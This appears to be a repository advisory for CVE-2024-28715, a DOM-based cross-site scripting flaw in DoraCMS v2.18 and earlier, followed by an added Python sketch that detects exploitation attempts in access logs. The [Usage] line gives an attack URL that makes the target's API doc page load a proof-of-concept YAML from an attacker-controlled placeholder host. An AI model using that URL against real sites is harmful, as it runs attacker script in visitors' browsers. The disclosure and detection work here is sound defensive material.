Lq0ne/CVE-2024-28715

CVE-2024-28715

[CVE ID]

CVE-2024-28715

[PRODUCT]

DoraCMS

[Version]

DoraCMS v2.18 and before

[PROBLEM TYPE]

DOM-based XSS.

[DESCRIPTION]

A cross-site scripting vulnerability in DoraCMS v2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.

[Usage]

https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml
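
A detection sketch for the request shape shown above, added here as an example and not part of the original repository: it scans web access logs for hits on the API doc page whose `url` parameter points at a spec on a host outside an allowlist. The log format, the `trusted_hosts` allowlist, the function names and the sample hosts are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name taken from the advisory's [Usage] line.
APIDOC_PATH = "/static/apidoc/index.html"
SPEC_PARAM = "url"
# Assumption: common/combined log format; only the request line is needed.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def external_spec_url(request_target, trusted_hosts):
    """Return the spec URL if the request loads the API doc page with a
    spec hosted outside trusted_hosts, otherwise None."""
    parts = urlsplit(request_target)
    if parts.path.lower() != APIDOC_PATH:
        return None
    # parse_qs percent-decodes values, so encoded spec URLs are covered too.
    for value in parse_qs(parts.query).get(SPEC_PARAM, []):
        host = (urlsplit(value.strip()).hostname or "").lower()
        # Relative spec paths have no host and are treated as same-origin.
        if host and host not in trusted_hosts:
            return value
    return None


def scan(log_lines, trusted_hosts):
    """Return (line_number, spec_url) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        spec = external_spec_url(match.group(1), trusted_hosts)
        if spec is not None:
            hits.append((number, spec))
    return hits


# Constructed sample log lines (not real traffic); hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2024:10:00:00 +0000] "GET /static/apidoc/index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Mar/2024:10:00:05 +0000] "GET /static/apidoc/index.html?url=https://other.example/POC.yaml HTTP/1.1" 200 1024',
    '198.51.100.9 - - [01/Mar/2024:10:01:00 +0000] "GET /static/apidoc/index.html?url=https%3A%2F%2Fother.example%2Fspec.yaml HTTP/1.1" 200 1024',
    '198.51.100.9 - - [01/Mar/2024:10:02:00 +0000] "GET /static/apidoc/index.html?url=https://cms.example/swagger.yaml HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, spec in scan(SAMPLE_LOG, {"cms.example"}):
        print(f"line {number}: external spec {spec}")
```

Because the parameter travels in the query string rather than the fragment, it reaches the server and appears in access logs, which is what makes this check possible.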
